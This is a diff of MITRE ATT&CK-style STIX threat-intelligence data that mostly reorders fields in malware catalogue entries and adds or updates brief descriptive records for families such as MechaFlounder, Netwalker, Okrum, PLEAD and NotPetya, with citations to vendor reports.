"id": "malware--049ff071-0b3c-4712-95d2-d21c6aa54501",
@@ -196177,13 +225228,13 @@
],
"modified": "2020-03-30T17:00:19.828Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"MURKYTOP"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--f72251cb-2be5-421f-a081-99c29a1209e7",
@@ -196215,13 +225266,13 @@
],
"modified": "2020-03-30T17:00:58.813Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "macOS"
+ ],
"x_mitre_aliases": [
"MacSpy"
],
- "x_mitre_platforms": [
- "macOS"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--35cd1d01-1ede-44d2-b073-a264d727bc04",
@@ -196258,16 +225309,16 @@
],
"modified": "2020-03-30T02:29:55.300Z",
"created": "2019-09-13T13:17:25.718Z",
- "x_mitre_version": "1.1",
- "x_mitre_aliases": [
- "Machete"
+ "x_mitre_contributors": [
+ "Matias Nicolas Porolli, ESET"
],
"x_mitre_platforms": [
"Windows"
],
- "x_mitre_contributors": [
- "Matias Nicolas Porolli, ESET"
- ]
+ "x_mitre_aliases": [
+ "Machete"
+ ],
+ "x_mitre_version": "1.1"
},
{
"id": "malware--1cc934e4-b01d-4543-a011-b988dfc1a458",
@@ -196304,10 +225355,85 @@
],
"modified": "2020-03-30T17:02:21.114Z",
"created": "2018-01-16T16:13:52.465Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Matroyshka"
],
+ "x_mitre_version": "1.1"
+ },
+ {
+ "external_references": [
+ {
+ "external_id": "S0459",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0459"
+ },
+ {
+ "source_name": "Unit 42 MechaFlounder March 2019",
+ "url": "https://unit42.paloaltonetworks.com/new-python-based-payload-mechaflounder-used-by-chafer/",
+ "description": "Falcone, R. (2019, March 4). New Python-Based Payload MechaFlounder Used by Chafer. Retrieved May 27, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "description": "[MechaFlounder](https://attack.mitre.org/software/S0459) is a python-based remote access tool (RAT) that has been used by [APT39](https://attack.mitre.org/groups/G0087). The payload uses a combination of actor developed code and code snippets freely available online in development communities.(Citation: Unit 42 MechaFlounder March 2019)",
+ "name": "MechaFlounder",
+ "id": "malware--dfa03c7d-79ed-4ce2-b9d1-ddc9dbf56ad2",
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-05-28T16:19:14.488Z",
+ "created": "2020-05-27T19:05:29.386Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "MechaFlounder"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
+ ]
+ },
+ {
+ "external_references": [
+ {
+ "external_id": "S0455",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0455"
+ },
+ {
+ "source_name": "Metamorfo",
+ "description": "(Citation: Medium Metamorfo Apr 2020)"
+ },
+ {
+ "source_name": "Medium Metamorfo Apr 2020",
+ "url": "https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767",
+ "description": "Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Metamorfo",
+ "description": "[Metamorfo](https://attack.mitre.org/software/S0455) is a banking trojan operated by a Brazilian cybercrime group that has been active since at least April 2018. The group focuses on targeting mostly brazilian users.(Citation: Medium Metamorfo Apr 2020)",
+ "id": "malware--81c57a96-fc8c-4f91-af8e-63e24c2927c2",
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-06-25T19:12:24.385Z",
+ "created": "2020-05-26T17:34:19.044Z",
+ "x_mitre_contributors": [
+ "Chen Erlich, @chen_erlich, enSilo"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "Metamorfo"
+ ],
"x_mitre_platforms": [
"Windows"
]
@@ -196347,13 +225473,13 @@
],
"modified": "2020-03-30T17:03:01.353Z",
"created": "2019-01-29T21:47:53.070Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"Micropsia"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--17dec760-9c8f-4f1b-9b4b-0ac47a453234",
@@ -196417,13 +225543,13 @@
],
"modified": "2020-03-30T17:04:51.952Z",
"created": "2017-05-31T21:32:36.919Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"MiniDuke"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--e3cedcfe-6515-4348-af65-7f2c4157bf0d",
@@ -196455,13 +225581,13 @@
],
"modified": "2020-03-30T17:05:26.798Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"MirageFox"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--e1161124-f22e-487f-9d5f-ed8efc8dcd61",
@@ -196489,13 +225615,13 @@
],
"modified": "2020-03-20T18:16:03.001Z",
"created": "2017-05-31T21:32:55.565Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Mis-Type"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--0db09158-6e48-4e7c-8ce7-2b10b9c0c039",
@@ -196523,13 +225649,13 @@
],
"modified": "2020-03-20T18:16:26.920Z",
"created": "2017-05-31T21:32:55.126Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Misdat"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--fbb470da-1d44-4f29-bbb3-9efbe20f94a3",
@@ -196566,13 +225692,13 @@
],
"modified": "2020-03-25T16:03:26.871Z",
"created": "2017-05-31T21:32:54.044Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Mivast"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--463f68f1-5cde-4dc2-a831-68b73488f8f4",
@@ -196631,13 +225757,13 @@
],
"modified": "2020-03-30T19:57:17.490Z",
"created": "2017-05-31T21:33:27.016Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"MoonWind"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"object_marking_refs": [
@@ -196687,17 +225813,17 @@
],
"modified": "2020-03-30T17:06:07.337Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_contributors": [
+ "Drew Church, Splunk"
],
+ "x_mitre_version": "2.1",
"x_mitre_aliases": [
"More_eggs",
"Terra Loader",
"SpicyOmelette"
],
- "x_mitre_version": "2.1",
- "x_mitre_contributors": [
- "Drew Church, Splunk"
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -196730,13 +225856,13 @@
],
"modified": "2020-03-30T17:06:45.586Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Mosquito"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--d1183cb9-258e-4f2f-8415-50ac8252c49e",
@@ -196768,13 +225894,13 @@
],
"modified": "2020-03-30T17:07:15.145Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"NDiskMonitor"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--53cf6cc4-65aa-445a-bcf8-c3d296f8a7a2",
@@ -196802,13 +225928,13 @@
],
"modified": "2020-03-30T17:07:46.499Z",
"created": "2017-05-31T21:32:27.787Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"NETEAGLE"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--2a70812b-f1ef-44db-8578-a496a227aef2",
@@ -196850,13 +225976,13 @@
],
"modified": "2020-03-30T17:09:00.491Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"NETWIRE"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -196893,13 +226019,13 @@
],
"modified": "2020-03-18T15:22:32.747Z",
"created": "2019-01-30T19:50:45.307Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"NOKKI"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--48523614-309e-43bf-a2b8-705c2b45d7b2",
@@ -196960,9 +226086,9 @@
"description": "(Citation: Proofpoint Leviathan Oct 2017)"
},
{
- "source_name": "Proofpoint Leviathan Oct 2017",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets",
"description": "Axel F, Pierre T. (2017, October 16). Leviathan: Espionage actor spearphishes maritime and defense targets. Retrieved February 15, 2018.",
- "url": "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets"
+ "source_name": "Proofpoint Leviathan Oct 2017"
},
{
"url": "https://www.f-secure.com/documents/996508/1030745/nanhaishu_whitepaper.pdf",
@@ -196977,15 +226103,15 @@
"labels": [
"malware"
],
- "modified": "2020-03-30T17:09:48.180Z",
+ "modified": "2020-06-23T20:05:03.169Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"NanHaiShu"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -197032,13 +226158,13 @@
],
"modified": "2020-03-30T17:10:28.673Z",
"created": "2019-01-29T20:05:35.952Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"NanoCore"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"object_marking_refs": [
@@ -197070,13 +226196,13 @@
],
"modified": "2020-03-20T01:52:50.303Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"NavRAT"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--c251e4a5-9a2e-4166-8e42-442af75c3b9a",
@@ -197147,14 +226273,14 @@
],
"modified": "2020-03-30T17:11:08.175Z",
"created": "2017-05-31T21:32:38.851Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Net Crawler",
"NetC"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--cafd0bf8-2b9c-46c7-ae3c-3e0f42c5062e",
@@ -197182,10 +226308,44 @@
],
"modified": "2020-03-30T17:11:38.961Z",
"created": "2017-05-31T21:32:25.361Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"NetTraveler"
],
+ "x_mitre_version": "1.1"
+ },
+ {
+ "external_references": [
+ {
+ "external_id": "S0457",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0457"
+ },
+ {
+ "source_name": "TrendMicro Netwalker May 2020",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/netwalker-fileless-ransomware-injected-via-reflective-loading/",
+ "description": "Victor, K.. (2020, May 18). Netwalker Fileless Ransomware Injected via Reflective Loading . Retrieved May 26, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "description": "[Netwalker](https://attack.mitre.org/software/S0457) is fileless ransomware written in PowerShell and executed directly in memory.(Citation: TrendMicro Netwalker May 2020)",
+ "name": "Netwalker",
+ "id": "malware--754effde-613c-4244-a83e-fb659b2a4d06",
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-06-16T16:14:19.924Z",
+ "created": "2020-05-26T21:02:38.186Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "Netwalker"
+ ],
"x_mitre_platforms": [
"Windows"
]
@@ -197216,29 +226376,50 @@
],
"modified": "2020-03-18T15:21:51.702Z",
"created": "2017-05-31T21:33:09.842Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Nidiran",
"Backdoor.Nidiran"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
+ "created": "2019-03-26T15:02:14.907Z",
+ "modified": "2020-06-18T20:27:49.511Z",
+ "labels": [
+ "malware"
+ ],
+ "type": "malware",
+ "id": "malware--5719af9d-6b16-46f9-9b28-fb019541ddbb",
+ "description": "[NotPetya](https://attack.mitre.org/software/S0368) is malware that was first seen in a worldwide attack starting on June 27, 2017. The main purpose of the malware appeared to be to effectively destroy data and disk structures on compromised systems. Though [NotPetya](https://attack.mitre.org/software/S0368) presents itself as a form of ransomware, it appears likely that the attackers never intended to make the encrypted data recoverable. As such, [NotPetya](https://attack.mitre.org/software/S0368) may be more appropriately thought of as a form of wiper malware. [NotPetya](https://attack.mitre.org/software/S0368) contains worm-like features to spread itself across a computer network using the SMBv1 exploits EternalBlue and EternalRomance.(Citation: Talos Nyetya June 2017)(Citation: Talos Nyetya June 2017)(Citation: US-CERT NotPetya 2017)(Citation: ESET Telebots June 2017)",
+ "name": "NotPetya",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"external_id": "S0368",
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/software/S0368"
},
+ {
+ "source_name": "ExPetr",
+ "description": "(Citation: ESET Telebots June 2017)"
+ },
+ {
+ "source_name": "Diskcoder.C",
+ "description": "(Citation: ESET Telebots June 2017)"
+ },
{
"source_name": "GoldenEye",
"description": "(Citation: Talos Nyetya June 2017)"
},
{
"source_name": "Petrwrap",
- "description": "(Citation: Talos Nyetya June 2017)"
+ "description": "(Citation: Talos Nyetya June 2017)(Citation: ESET Telebots June 2017)"
},
{
"source_name": "Nyetya",
@@ -197250,29 +226431,23 @@
"source_name": "Talos Nyetya June 2017"
},
{
- "description": "US-CERT. (2017, July 1). Alert (TA17-181A): Petya Ransomware. Retrieved March 15, 2019.",
+ "source_name": "US-CERT NotPetya 2017",
"url": "https://www.us-cert.gov/ncas/alerts/TA17-181A",
- "source_name": "US-CERT NotPetya 2017"
+ "description": "US-CERT. (2017, July 1). Alert (TA17-181A): Petya Ransomware. Retrieved March 15, 2019."
+ },
+ {
+ "source_name": "ESET Telebots June 2017",
+ "url": "https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/",
+ "description": "Cherepanov, A.. (2017, June 30). TeleBots are back: Supply chain attacks against Ukraine. Retrieved June 11, 2020."
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "NotPetya",
- "description": "[NotPetya](https://attack.mitre.org/software/S0368) is malware that was first seen in a worldwide attack starting on June 27, 2017. The main purpose of the malware appeared to be to effectively destroy data and disk structures on compromised systems. Though [NotPetya](https://attack.mitre.org/software/S0368) presents itself as a form of ransomware, it appears likely that the attackers never intended to make the encrypted data recoverable. As such, [NotPetya](https://attack.mitre.org/software/S0368) may be more appropriately thought of as a form of wiper malware. [NotPetya](https://attack.mitre.org/software/S0368) contains worm-like features to spread itself across a computer network using the SMBv1 exploits EternalBlue and EternalRomance.(Citation: Talos Nyetya June 2017)(Citation: Talos Nyetya June 2017)(Citation: US-CERT NotPetya 2017)",
- "id": "malware--5719af9d-6b16-46f9-9b28-fb019541ddbb",
- "type": "malware",
- "labels": [
- "malware"
- ],
- "modified": "2020-03-28T21:37:04.899Z",
- "created": "2019-03-26T15:02:14.907Z",
"x_mitre_platforms": [
"Windows"
],
"x_mitre_aliases": [
"NotPetya",
+ "ExPetr",
+ "Diskcoder.C",
"GoldenEye",
"Petrwrap",
"Nyetya"
@@ -197310,14 +226485,14 @@
],
"modified": "2020-03-19T23:51:58.976Z",
"created": "2017-05-31T21:33:18.946Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"OLDBAIT",
"Sasfis"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--f6d1d2cb-12f5-4221-9636-44606ea1f3f8",
@@ -197345,13 +226520,13 @@
],
"modified": "2020-03-18T22:53:32.172Z",
"created": "2018-01-16T16:13:52.465Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"OSInfo"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -197402,16 +226577,23 @@
],
"modified": "2020-03-18T18:27:13.903Z",
"created": "2019-08-29T18:52:20.879Z",
- "x_mitre_platforms": [
- "macOS"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"OSX/Shlayer",
"Crossrider"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "macOS"
+ ]
},
{
+ "id": "malware--b00f90b6-c75c-4bfd-b813-ca9e6c9ebf29",
+ "name": "OSX_OCEANLOTUS.D",
+ "description": "[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) is a MacOS backdoor that has been used by [APT32](https://attack.mitre.org/groups/G0050).(Citation: TrendMicro MacOS April 2018)",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"external_id": "S0352",
@@ -197428,18 +226610,11 @@
"source_name": "TrendMicro MacOS April 2018"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) is a MacOS backdoor that has been used by [APT32](https://attack.mitre.org/groups/G0050).(Citation: TrendMicro MacOS April 2018)",
- "name": "OSX_OCEANLOTUS.D",
- "id": "malware--b00f90b6-c75c-4bfd-b813-ca9e6c9ebf29",
"type": "malware",
"labels": [
"malware"
],
- "modified": "2020-03-30T17:12:14.783Z",
+ "modified": "2020-06-23T20:11:11.730Z",
"created": "2019-01-30T19:18:19.667Z",
"x_mitre_platforms": [
"macOS"
@@ -197479,13 +226654,13 @@
],
"modified": "2020-03-30T17:12:48.823Z",
"created": "2019-01-30T15:43:19.105Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"OceanSalt"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -197517,13 +226692,50 @@
],
"modified": "2020-03-20T18:57:08.610Z",
"created": "2019-01-30T13:24:08.616Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"Octopus"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
+ },
+ {
+ "external_references": [
+ {
+ "external_id": "S0439",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0439"
+ },
+ {
+ "source_name": "ESET Okrum July 2019",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf",
+ "description": "Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "description": "[Okrum](https://attack.mitre.org/software/S0439) is a Windows backdoor that has been seen in use since December 2016 with strong links to [Ke3chang](https://attack.mitre.org/groups/G0004).(Citation: ESET Okrum July 2019)",
+ "name": "Okrum",
+ "id": "malware--4b6ec280-7bbb-48ff-ae59-b189520ebe83",
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-05-14T21:17:53.756Z",
+ "created": "2020-05-06T21:12:31.535Z",
+ "x_mitre_contributors": [
+ "ESET"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "Okrum"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--3249e92a-870b-426d-8790-ba311c1abfb4",
@@ -197551,13 +226763,13 @@
],
"modified": "2020-03-25T17:57:57.273Z",
"created": "2019-03-25T14:07:22.547Z",
- "x_mitre_version": "1.2",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Olympic Destroyer"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.2"
},
{
"id": "malware--b136d088-a829-432c-ac26-5529c26d4c7e",
@@ -197585,13 +226797,13 @@
],
"modified": "2020-03-30T17:13:20.084Z",
"created": "2017-05-31T21:32:37.341Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"OnionDuke"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"object_marking_refs": [
@@ -197628,13 +226840,13 @@
],
"modified": "2020-03-30T02:36:44.945Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.2",
"x_mitre_aliases": [
"OopsIE"
],
- "x_mitre_version": "1.2"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"object_marking_refs": [
@@ -197675,14 +226887,14 @@
],
"modified": "2020-03-30T17:13:56.470Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "2.1",
"x_mitre_aliases": [
"Orz",
"AIRBREAK"
],
- "x_mitre_version": "2.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--a60657fa-e2e7-4f8f-8128-a882534ae8c5",
@@ -197710,13 +226922,13 @@
],
"modified": "2020-03-30T03:01:04.725Z",
"created": "2017-05-31T21:32:47.412Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"OwaAuth"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--b2c5d3ca-b43a-4888-ad8d-e2d43497bf85",
@@ -197744,15 +226956,15 @@
],
"modified": "2020-03-30T17:14:31.945Z",
"created": "2017-05-31T21:32:16.715Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"P2P ZeuS",
"Peer-to-Peer ZeuS",
"Gameover ZeuS"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--f6ae7a52-f3b6-4525-9daf-640c083f006e",
@@ -197784,13 +226996,13 @@
],
"modified": "2020-03-30T17:15:03.862Z",
"created": "2017-12-14T16:46:06.044Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"PHOREAL"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--21c0b55b-5ff3-4654-a05e-e3fc1ee1ce1b",
@@ -197822,12 +227034,68 @@
],
"modified": "2020-03-30T17:15:33.608Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"PLAINTEE"
],
+ "x_mitre_version": "1.1"
+ },
+ {
+ "id": "malware--b57f419e-8b12-49d3-886b-145383725dcd",
+ "name": "PLEAD",
+ "description": "[PLEAD](https://attack.mitre.org/software/S0435) is a remote access tool (RAT) and downloader used by [BlackTech](https://attack.mitre.org/groups/G0098) in targeted attacks in East Asia including Taiwan, Japan, and Hong Kong.(Citation: TrendMicro BlackTech June 2017)(Citation: JPCert PLEAD Downloader June 2018) [PLEAD](https://attack.mitre.org/software/S0435) has also been referred to as [TSCookie](https://attack.mitre.org/software/S0436), though more recent reporting indicates likely separation between the two.(Citation: JPCert TSCookie March 2018)(Citation: JPCert PLEAD Downloader June 2018) ",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "external_id": "S0435",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0435"
+ },
+ {
+ "source_name": "PLEAD",
+ "description": "PLEAD derived its name from letters used in backdoor commands in intrusion campaigns.(Citation: Trend Micro PLEAD RTLO)"
+ },
+ {
+ "source_name": "TrendMicro BlackTech June 2017",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
+ "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020."
+ },
+ {
+ "source_name": "JPCert PLEAD Downloader June 2018",
+ "url": "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html",
+ "description": "Tomonaga, S.. (2018, June 8). PLEAD Downloader Used by BlackTech. Retrieved May 6, 2020."
+ },
+ {
+ "source_name": "JPCert TSCookie March 2018",
+ "url": "https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html",
+ "description": "Tomonaga, S.. (2018, March 6). Malware \u201cTSCookie\u201d. Retrieved May 6, 2020."
+ },
+ {
+ "source_name": "Trend Micro PLEAD RTLO",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/plead-targeted-attacks-against-taiwanese-government-agencies-2/",
+ "description": "Alintanahin, K.. (2014, May 23). PLEAD Targeted Attacks Against Taiwanese Government Agencies. Retrieved April 22, 2019."
+ }
+ ],
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-07-04T01:44:16.182Z",
+ "created": "2020-05-06T12:55:10.969Z",
"x_mitre_platforms": [
"Windows"
+ ],
+ "x_mitre_aliases": [
+ "PLEAD"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_contributors": [
+ "Tatsuya Daitoku, Cyber Defense Institute, Inc."
]
},
{
@@ -197860,13 +227128,13 @@
],
"modified": "2020-03-30T17:16:18.343Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"POORAIM"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"object_marking_refs": [
@@ -197898,13 +227166,13 @@
],
"modified": "2020-03-30T17:16:53.396Z",
"created": "2017-12-14T16:46:06.044Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.2",
"x_mitre_aliases": [
"POSHSPY"
],
- "x_mitre_version": "1.2"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--17e919aa-4a49-445c-b103-dbb8df9e7351",
@@ -197945,14 +227213,14 @@
],
"modified": "2020-03-30T17:17:35.369Z",
"created": "2017-05-31T21:33:24.739Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
